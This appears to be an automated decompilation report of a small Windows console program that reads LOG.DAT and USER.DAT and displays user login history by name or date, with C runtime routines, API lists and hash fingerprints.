                                                                      									_t92[3] = _t74 | 0x00000020;
                                                                      									L29:
                                                                      									_t52 = _t45 | 0xffffffff;
                                                                      								} else {
                                                                      									_t85 = _t74 & 0xfffffffe;
                                                                      									__eflags = _t85;
                                                                      									 *_t92 = _t92[2];
                                                                      									_t92[3] = _t85;
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t67 = E00BE8EFF(__eflags);
                                                                      							 *_t67 = 0x22;
                                                                      							goto L6;
                                                                      						}
                                                                      					} else {
                                                                      						_t67 = E00BE8EFF(__eflags);
                                                                      						 *_t67 = 9;
                                                                      						L6:
                                                                      						_t92[3] = _t92[3] | 0x00000020;
                                                                      						_t52 = _t67 | 0xffffffff;
                                                                      					}
                                                                      					return _t52;
                                                                      				} else {
                                                                      					return _t44 | 0xffffffff;
                                                                      				}
                                                                      			}


























                                                                      0x00bebb70
                                                                      0x00bebb77
                                                                      0x00bebb7f
                                                                      0x00bebb84
                                                                      0x00bebb8a
                                                                      0x00bebb8d
                                                                      0x00bebb8f
                                                                      0x00bebb92
                                                                      0x00bebba1
                                                                      0x00bebba4
                                                                      0x00bebbbe
                                                                      0x00bebbc0
                                                                      0x00bebbc3
                                                                      0x00bebbd8
                                                                      0x00bebbde
                                                                      0x00bebbe1
                                                                      0x00bebbe4
                                                                      0x00bebbe7
                                                                      0x00bebbec
                                                                      0x00bebbee
                                                                      0x00bebbf6
                                                                      0x00bebbf8
                                                                      0x00bebc06
                                                                      0x00bebc07
                                                                      0x00bebc0d
                                                                      0x00bebc0f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bebbfa
                                                                      0x00bebbfa
                                                                      0x00bebc02
                                                                      0x00bebc04
                                                                      0x00bebc11
                                                                      0x00bebc12
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bebc04
                                                                      0x00bebbf8
                                                                      0x00bebc18
                                                                      0x00bebc1f
                                                                      0x00bebc9d
                                                                      0x00bebc9e
                                                                      0x00bebc9f
                                                                      0x00bebca5
                                                                      0x00bebca6
                                                                      0x00bebca7
                                                                      0x00bebcaf
                                                                      0x00000000
                                                                      0x00bebc21
                                                                      0x00bebc21
                                                                      0x00bebc26
                                                                      0x00bebc29
                                                                      0x00bebc2e
                                                                      0x00bebc31
                                                                      0x00bebc34
                                                                      0x00bebc37
                                                                      0x00bebc39
                                                                      0x00bebc52
                                                                      0x00bebc55
                                                                      0x00bebc72
                                                                      0x00bebc72
                                                                      0x00bebc57
                                                                      0x00bebc57
                                                                      0x00bebc5a
                                                                      0x00000000
                                                                      0x00bebc5c
                                                                      0x00bebc69
                                                                      0x00bebc69
                                                                      0x00bebc5a
                                                                      0x00bebc77
                                                                      0x00bebc7b
                                                                      0x00000000
                                                                      0x00bebc7d
                                                                      0x00bebc7d
                                                                      0x00bebc7f
                                                                      0x00bebc80
                                                                      0x00bebc81
                                                                      0x00bebc87
                                                                      0x00bebc8c
                                                                      0x00bebc8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bebc8f
                                                                      0x00bebc3b
                                                                      0x00bebc3b
                                                                      0x00bebc3c
                                                                      0x00bebc3d
                                                                      0x00bebc46
                                                                      0x00bebc91
                                                                      0x00bebc94
                                                                      0x00bebc97
                                                                      0x00bebcb1
                                                                      0x00bebcb1
                                                                      0x00bebcb4
                                                                      0x00bebcbf
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00000000
                                                                      0x00bebcb6
                                                                      0x00bebcb4
                                                                      0x00bebc39
                                                                      0x00bebbc5
                                                                      0x00bebbc5
                                                                      0x00bebbc8
                                                                      0x00bebbcb
                                                                      0x00bebc4d
                                                                      0x00bebcba
                                                                      0x00bebcba
                                                                      0x00bebbcd
                                                                      0x00bebbd0
                                                                      0x00bebbd0
                                                                      0x00bebbd3
                                                                      0x00bebbd5
                                                                      0x00000000
                                                                      0x00bebbd5
                                                                      0x00bebbcb
                                                                      0x00bebba6
                                                                      0x00bebba6
                                                                      0x00bebbab
                                                                      0x00000000
                                                                      0x00bebbab
                                                                      0x00bebb94
                                                                      0x00bebb94
                                                                      0x00bebb99
                                                                      0x00bebbb1
                                                                      0x00bebbb1
                                                                      0x00bebbb5
                                                                      0x00bebbb5
                                                                      0x00bebcc7
                                                                      0x00bebb79
                                                                      0x00bebb7d
                                                                      0x00bebb7d

                                                                      APIs
                                                                      • __ioinit.LIBCMT ref: 00BEBB70
                                                                        • Part of subcall function 00BEA5A7: InitOnceExecuteOnce.KERNEL32(00C0229C,00BEA5E2,00000000,00000000,00BF1205,?,?,00BE9886,00000000,?,?,?,00BE71AD,-00000020,00BFD7B8,0000000C), ref: 00BEA5B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Once$ExecuteInit__ioinit
                                                                      • String ID:
                                                                      • API String ID: 129814473-0
                                                                      • Opcode ID: d9d38c329a40a4caa3362b90e704a58bf015394371171dd4890ef3e316bf4928
                                                                      • Instruction ID: e30547c7261321678209ec455157081143a0936336451dfa374e6e3aa73479c0
                                                                      • Opcode Fuzzy Hash: d9d38c329a40a4caa3362b90e704a58bf015394371171dd4890ef3e316bf4928
                                                                      • Instruction Fuzzy Hash: 7A411271504B849FD7289B7AC892E7B77E4DF45320B248BADE4AA873D2DB74D8408B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E00BF1D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                      				void* _t7;
                                                                      				long _t8;
                                                                      				intOrPtr* _t9;
                                                                      				intOrPtr* _t12;
                                                                      				long _t20;
                                                                      				long _t31;
                                                                      
                                                                      				if(_a4 != 0) {
                                                                      					_t31 = _a8;
                                                                      					__eflags = _t31;
                                                                      					if(_t31 != 0) {
                                                                      						_push(__ebx);
                                                                      						while(1) {
                                                                      							__eflags = _t31 - 0xffffffe0;
                                                                      							if(_t31 > 0xffffffe0) {
                                                                      								break;
                                                                      							}
                                                                      							__eflags = _t31;
                                                                      							if(_t31 == 0) {
                                                                      								_t31 = _t31 + 1;
                                                                      								__eflags = _t31;
                                                                      							}
                                                                      							_t7 = HeapReAlloc( *0xc02a68, 0, _a4, _t31);
                                                                      							_t20 = _t7;
                                                                      							__eflags = _t20;
                                                                      							if(_t20 != 0) {
                                                                      								L17:
                                                                      								_t8 = _t20;
                                                                      							} else {
                                                                      								__eflags =  *0xc02a64 - _t7;
                                                                      								if(__eflags == 0) {
                                                                      									_t9 = E00BE8EFF(__eflags);
                                                                      									 *_t9 = E00BE8F12(GetLastError());
                                                                      									goto L17;
                                                                      								} else {
                                                                      									__eflags = E00BEC6EE(_t7, _t31);
                                                                      									if(__eflags == 0) {
                                                                      										_t12 = E00BE8EFF(__eflags);
                                                                      										 *_t12 = E00BE8F12(GetLastError());
                                                                      										L12:
                                                                      										_t8 = 0;
                                                                      										__eflags = 0;
                                                                      									} else {
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						E00BEC6EE(_t6, _t31);
                                                                      						 *((intOrPtr*)(E00BE8EFF(__eflags))) = 0xc;
                                                                      						goto L12;
                                                                      					} else {
                                                                      						E00BE8F53(_a4);
                                                                      						_t8 = 0;
                                                                      					}
                                                                      					L14:
                                                                      					return _t8;
                                                                      				} else {
                                                                      					return E00BE77C5(__ebx, __edx, __edi, _a8);
                                                                      				}
                                                                      			}









                                                                      0x00bf1d2d
                                                                      0x00bf1d3b
                                                                      0x00bf1d3e
                                                                      0x00bf1d40
                                                                      0x00bf1d4f
                                                                      0x00bf1d82
                                                                      0x00bf1d82
                                                                      0x00bf1d85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf1d52
                                                                      0x00bf1d54
                                                                      0x00bf1d56
                                                                      0x00bf1d56
                                                                      0x00bf1d56
                                                                      0x00bf1d63
                                                                      0x00bf1d69
                                                                      0x00bf1d6b
                                                                      0x00bf1d6d
                                                                      0x00bf1dcd
                                                                      0x00bf1dcd
                                                                      0x00bf1d6f
                                                                      0x00bf1d6f
                                                                      0x00bf1d75
                                                                      0x00bf1db7
                                                                      0x00bf1dcb
                                                                      0x00000000
                                                                      0x00bf1d77
                                                                      0x00bf1d7e
                                                                      0x00bf1d80
                                                                      0x00bf1d9f
                                                                      0x00bf1db3
                                                                      0x00bf1d99
                                                                      0x00bf1d99
                                                                      0x00bf1d99
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf1d80
                                                                      0x00bf1d75
                                                                      0x00000000
                                                                      0x00bf1d9b
                                                                      0x00bf1d88
                                                                      0x00bf1d93
                                                                      0x00000000
                                                                      0x00bf1d42
                                                                      0x00bf1d45
                                                                      0x00bf1d4b
                                                                      0x00bf1d4b
                                                                      0x00bf1d9c
                                                                      0x00bf1d9e
                                                                      0x00bf1d2f
                                                                      0x00bf1d39
                                                                      0x00bf1d39

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00BF1D32
                                                                        • Part of subcall function 00BE77C5: __FF_MSGBANNER.LIBCMT ref: 00BE77DC
                                                                        • Part of subcall function 00BE77C5: __NMSG_WRITE.LIBCMT ref: 00BE77E3
                                                                        • Part of subcall function 00BE77C5: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00BEC5BB,00000000,00000000,00000000,00000000,?,00BEBF28,00000018,00BFD900), ref: 00BE7808
                                                                      • _free.LIBCMT ref: 00BF1D45
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: AllocHeap_free_malloc
                                                                      • String ID:
                                                                      • API String ID: 2734353464-0
                                                                      • Opcode ID: 62a3c8c18ecc3ec75da1cc60553dc75c103e61240e830e1d77825451b07ba237
                                                                      • Instruction ID: f364da9aaa72c9275b2584bd21f8d663178f04c0b321dcb86f482f219fdc2527
                                                                      • Opcode Fuzzy Hash: 62a3c8c18ecc3ec75da1cc60553dc75c103e61240e830e1d77825451b07ba237
                                                                      • Instruction Fuzzy Hash: 1511C136504619EFCB253F7DAC04A7A3BE99F04360B104CB5FA099B1A1DF3489489790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00BE860D
                                                                        • Part of subcall function 00BEE840: __87except.LIBCMT ref: 00BEE87B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      • Opcode ID: 6d96d960c5c786e2777006d6ffed34b07fc2ebe0b56def37530e25f916f06293
                                                                      • Instruction ID: 1cecb34d9118640753a1d4653572143da076cda970e019edcdc130bd542b5e1a
                                                                      • Opcode Fuzzy Hash: 6d96d960c5c786e2777006d6ffed34b07fc2ebe0b56def37530e25f916f06293
                                                                      • Instruction Fuzzy Hash: 88518E24A08AC5CACB117B16CA4137E2BD4EB50711F204DE9E4ED432EAEF35CCD4DA46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00BE347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				intOrPtr _t218;
                                                                      				void* _t228;
                                                                      				void* _t249;
                                                                      				void* _t270;
                                                                      				void* _t283;
                                                                      				void* _t287;
                                                                      				void* _t306;
                                                                      				intOrPtr _t307;
                                                                      				void* _t309;
                                                                      				intOrPtr _t310;
                                                                      				void* _t313;
                                                                      				void* _t314;
                                                                      				intOrPtr _t320;
                                                                      				void* _t336;
                                                                      				intOrPtr _t364;
                                                                      				void* _t371;
                                                                      				intOrPtr _t394;
                                                                      				void* _t397;
                                                                      				void* _t421;
                                                                      				void* _t433;
                                                                      				void* _t435;
                                                                      				void* _t436;
                                                                      				void* _t437;
                                                                      				void* _t442;
                                                                      				void* _t443;
                                                                      				void* _t446;
                                                                      				void* _t448;
                                                                      				void* _t450;
                                                                      				void* _t451;
                                                                      				void* _t457;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					_t457 = __fp0;
                                                                      					_t421 = __esi;
                                                                      					_t397 = __edi;
                                                                      					_t314 = __ebx;
                                                                      					 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                                      					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
                                                                      					while(1) {
                                                                      						L69:
                                                                      						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      						if(__eflags < 0) {
                                                                      						}
                                                                      						L70:
                                                                      						E00BE12B0(5,  *(_t433 - 0xc) + 0xa);
                                                                      						_push(1 +  *(_t433 - 8));
                                                                      						_push("%d.");
                                                                      						E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
                                                                      						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
                                                                      						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                                      						_t270 = E00BE82C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
                                                                      						_t448 = _t435 + 0xc;
                                                                      						__eflags = _t270 - 0xa;
                                                                      						if(__eflags < 0) {
                                                                      							_t336 =  *(_t433 - 8) * 0x45;
                                                                      							__eflags = _t336;
                                                                      							_t185 = _t336 + 0x22; // 0x23
                                                                      							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
                                                                      							E00BE16A0(_t397, _t421, _t457);
                                                                      						}
                                                                      						L72:
                                                                      						E00BE12B0(9,  *(_t433 - 0xc) + 0xa);
                                                                      						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
                                                                      						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
                                                                      						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
                                                                      						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
                                                                      						_push("%s\t\t%s\t%s\t\t%s");
                                                                      						E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      						_t435 = _t448 + 0x14;
                                                                      						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
                                                                      						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
                                                                      							L74:
                                                                      							goto L0;
                                                                      						} else {
                                                                      							L73:
                                                                      							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
                                                                      						}
                                                                      						L75:
                                                                      						_t322 =  *((char*)(_t433 - 1));
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                                      						if( *((char*)(_t433 - 1)) == 0x53) {
                                                                      							L77:
                                                                      							 *(_t433 - 0x34) = 1;
                                                                      						} else {
                                                                      							L76:
                                                                      							__eflags =  *((char*)(_t433 - 1)) - 0x73;
                                                                      							if( *((char*)(_t433 - 1)) == 0x73) {
                                                                      								goto L77;
                                                                      							}
                                                                      						}
                                                                      						L78:
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                                      						if( *((char*)(_t433 - 1)) == 0x20) {
                                                                      							_t322 =  *(_t433 - 8);
                                                                      							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
                                                                      								 *(_t433 - 0x1c) = 0;
                                                                      							}
                                                                      						}
                                                                      						L81:
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                                      						if(__eflags == 0) {
                                                                      							L50:
                                                                      							E00BE20E0(_t322, _t397, _t421, __eflags, _t457);
                                                                      							__eflags =  *(_t433 - 0x14) - 0xc;
                                                                      							if(__eflags >= 0) {
                                                                      								E00BE12B0(0xf, 0x15);
                                                                      								_push("Press SPACE BAR to view more data");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t446 = _t435 + 4;
                                                                      							} else {
                                                                      								E00BE12B0(8, 0x15);
                                                                      								_push("Press S to toggle Sorting between ascending or descending order.");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t446 = _t435 + 4;
                                                                      							}
                                                                      							L53:
                                                                      							E00BE12B0(5, 8);
                                                                      							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							_t435 = _t446 + 4;
                                                                      							E00BE12B0(4, 9);
                                                                      							 *(_t433 - 8) = 0;
                                                                      							while(1) {
                                                                      								L55:
                                                                      								__eflags =  *(_t433 - 8) - 0x46;
                                                                      								if(__eflags >= 0) {
                                                                      									break;
                                                                      								}
                                                                      								L56:
                                                                      								_push(0xc4);
                                                                      								_push("%c");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t435 = _t435 + 8;
                                                                      								L54:
                                                                      								_t287 = 1 +  *(_t433 - 8);
                                                                      								__eflags = _t287;
                                                                      								 *(_t433 - 8) = _t287;
                                                                      							}
                                                                      							L57:
                                                                      							__eflags =  *(_t433 - 0x34);
                                                                      							if( *(_t433 - 0x34) != 0) {
                                                                      								L58:
                                                                      								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
                                                                      								while(1) {
                                                                      									L60:
                                                                      									__eflags =  *(_t433 - 8);
                                                                      									if( *(_t433 - 8) < 0) {
                                                                      										break;
                                                                      									}
                                                                      									L61:
                                                                      									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                                      									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                                      									_t435 = _t435 + 0xc;
                                                                      									_t397 = _t421 + 0x22;
                                                                      									asm("movsb");
                                                                      									L59:
                                                                      									_t371 =  *(_t433 - 8) - 1;
                                                                      									__eflags = _t371;
                                                                      									 *(_t433 - 8) = _t371;
                                                                      								}
                                                                      								L62:
                                                                      								 *(_t433 - 8) = 0;
                                                                      								while(1) {
                                                                      									L64:
                                                                      									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                                      										goto L66;
                                                                      									}
                                                                      									L65:
                                                                      									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                                      									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                                      									_t435 = _t435 + 0xc;
                                                                      									_t397 = _t421 + 0x22;
                                                                      									asm("movsb");
                                                                      									L63:
                                                                      									_t283 = 1 +  *(_t433 - 8);
                                                                      									__eflags = _t283;
                                                                      									 *(_t433 - 8) = _t283;
                                                                      								}
                                                                      							}
                                                                      							L66:
                                                                      							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
                                                                      							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
                                                                      								 *(_t433 - 0x1c) = 0;
                                                                      							}
                                                                      							L68:
                                                                      							 *(_t433 - 8) =  *(_t433 - 0x1c);
                                                                      							 *(_t433 - 0xc) = 0;
                                                                      							L69:
                                                                      							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      							if(__eflags < 0) {
                                                                      							}
                                                                      							goto L75;
                                                                      						}
                                                                      						L82:
                                                                      						_t249 =  *((char*)(_t433 - 1));
                                                                      						__eflags = _t249 - 0x73;
                                                                      						if(__eflags == 0) {
                                                                      							goto L50;
                                                                      						}
                                                                      						L83:
                                                                      						_t322 =  *((char*)(_t433 - 1));
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                                      						if(__eflags == 0) {
                                                                      							goto L50;
                                                                      						}
                                                                      						L84:
                                                                      						while(1) {
                                                                      							L86:
                                                                      							__eflags = 1;
                                                                      							if(1 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							L1:
                                                                      							 *(_t433 - 8) = 0;
                                                                      							 *(_t433 - 0x28) = 0;
                                                                      							 *(_t433 - 0x1c) = 0;
                                                                      							 *(_t433 - 0x34) = 0;
                                                                      							_t218 = E00BE6EF1("LOG.DAT", "r");
                                                                      							_t436 = _t435 + 8;
                                                                      							 *0xc02f20 = _t218;
                                                                      							while(1) {
                                                                      								L2:
                                                                      								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
                                                                      								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
                                                                      								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
                                                                      								_t320 =  *0xc02f20; // 0x0
                                                                      								_t228 = E00BE7021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
                                                                      								_t437 = _t436 + 0x18;
                                                                      								if(_t228 == 0xffffffff) {
                                                                      									break;
                                                                      								}
                                                                      								L3:
                                                                      								_t307 = E00BE6EF1("USER.DAT", "r");
                                                                      								_t450 = _t437 + 8;
                                                                      								 *0xc02f28 = _t307;
                                                                      								while(1) {
                                                                      									L4:
                                                                      									_push(_t433 - 0x78);
                                                                      									_push(_t433 - 0x58);
                                                                      									_t394 =  *0xc02f28; // 0x0
                                                                      									_t309 = E00BE7021(_t394, "%s %s %s\n", _t433 - 0x38);
                                                                      									_t451 = _t450 + 0x14;
                                                                      									if(_t309 == 0xffffffff) {
                                                                      										break;
                                                                      									}
                                                                      									L5:
                                                                      									_t313 = E00BE8230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
                                                                      									_t450 = _t451 + 8;
                                                                      									if(_t313 == 0) {
                                                                      										 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                                      									}
                                                                      								}
                                                                      								L8:
                                                                      								_t310 =  *0xc02f28; // 0x0
                                                                      								_push(_t310);
                                                                      								E00BE6DB6(_t314, _t397, _t421, __eflags);
                                                                      								_t436 = _t451 + 4;
                                                                      							}
                                                                      							L9:
                                                                      							 *(_t433 - 0x30) =  *(_t433 - 8);
                                                                      							_t364 =  *0xc02f20; // 0x0
                                                                      							_push(_t364);
                                                                      							E00BE6DB6(_t314, _t397, _t421, __eflags);
                                                                      							E00BE20E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
                                                                      							E00BE12B0(0x1e, 8);
                                                                      							_push("1. View by USER NAME");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							E00BE12B0(0x1e, 0xa);
                                                                      							_push("2. View by DATE");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							E00BE12B0(0x1e, 0xc);
                                                                      							_push("3. View ALL User history");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							E00BE12B0(0x1e, 0xe);
                                                                      							_push("4. Return to main menu");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							_t442 = _t437 + 0x14;
                                                                      							E00BE12B0(1, 0xf);
                                                                      							 *(_t433 - 8) = 0;
                                                                      							while(1) {
                                                                      								L11:
                                                                      								__eflags =  *(_t433 - 8) - 0x4e;
                                                                      								if(__eflags >= 0) {
                                                                      									break;
                                                                      								}
                                                                      								L12:
                                                                      								_push("_");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t442 = _t442 + 4;
                                                                      								_t306 = 1 +  *(_t433 - 8);
                                                                      								__eflags = _t306;
                                                                      								 *(_t433 - 8) = _t306;
                                                                      							}
                                                                      							L13:
                                                                      							E00BE12B0(0x17, 0x11);
                                                                      							_push(" Press a number between the range [1 -4]  ");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							_t443 = _t442 + 4;
                                                                      							 *(_t433 - 0xc) = 0;
                                                                      							_t322 =  *(_t433 - 0xc);
                                                                      							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
                                                                      							E00BE20E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
                                                                      							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
                                                                      							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
                                                                      							__eflags =  *(_t433 - 0x20) - 3;
                                                                      							if(__eflags > 0) {
                                                                      								L38:
                                                                      								E00BE20E0(_t322, _t397, _t421, __eflags, _t457);
                                                                      								E00BE12B0(0xa, 0xa);
                                                                      								_push("Your input is out of range! Enter a choice between 1 to 4!");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								E00BE12B0(0xf, 0xc);
                                                                      								_push("Press ENTER to return to main menu...");
                                                                      								_t249 = E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t435 = _t443 + 8;
                                                                      								 *(_t433 - 0x28) = 1;
                                                                      								goto L39;
                                                                      							} else {
                                                                      								L14:
                                                                      								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M00BE35F8))) {
                                                                      									case 0:
                                                                      										L15:
                                                                      										E00BE12B0(0x1e, 0xa);
                                                                      										_push("Enter user name : ");
                                                                      										E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      										_t365 = _t433 - 0x58;
                                                                      										_t249 = E00BE738B(" %s", _t433 - 0x58);
                                                                      										_t435 = _t443 + 0xc;
                                                                      										 *(_t433 - 8) = 0;
                                                                      										while(1) {
                                                                      											L17:
                                                                      											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
                                                                      											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
                                                                      												break;
                                                                      											}
                                                                      											L18:
                                                                      											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
                                                                      											_t299 = E00BE8230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
                                                                      											_t435 = _t435 + 8;
                                                                      											__eflags = _t299;
                                                                      											if(_t299 == 0) {
                                                                      												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
                                                                      												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                                      												_t435 = _t435 + 0xc;
                                                                      												_t397 = _t421 + 0x22;
                                                                      												asm("movsb");
                                                                      												_t303 = 1 +  *(_t433 - 0xc);
                                                                      												__eflags = _t303;
                                                                      												 *(_t433 - 0xc) = _t303;
                                                                      											}
                                                                      											_t249 = 1 +  *(_t433 - 8);
                                                                      											__eflags = _t249;
                                                                      											 *(_t433 - 8) = _t249;
                                                                      										}
                                                                      										L21:
                                                                      										_t322 =  *(_t433 - 0xc);
                                                                      										 *(_t433 - 0x14) =  *(_t433 - 0xc);
                                                                      										goto L39;
                                                                      									case 1:
                                                                      										do {
                                                                      											L22:
                                                                      											__eax = E00BE12B0(0x1e, 0xa);
                                                                      											_push("Enter Date (dd/mm/yyyy) : ");
                                                                      											__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      											__esp = __esp + 4;
                                                                      											__edx = __ebp - 0x58;
                                                                      											E00BE738B(" %s", __ebp - 0x58) = __ebp - 0x58;
                                                                      											__eflags = E00BE1E60(__eflags, __ebp - 0x58);
                                                                      											if(__eflags == 0) {
                                                                      												__eax = E00BE1500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
                                                                      												_push(0xbff8b0);
                                                                      												__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      												__esp = __esp + 4;
                                                                      											}
                                                                      											__ecx = __ebp - 0x58;
                                                                      											__eflags = E00BE1E60(__eflags, __ebp - 0x58);
                                                                      										} while (__eflags == 0);
                                                                      										__edx = __ebp - 0x58;
                                                                      										_push(__ebp - 0x58);
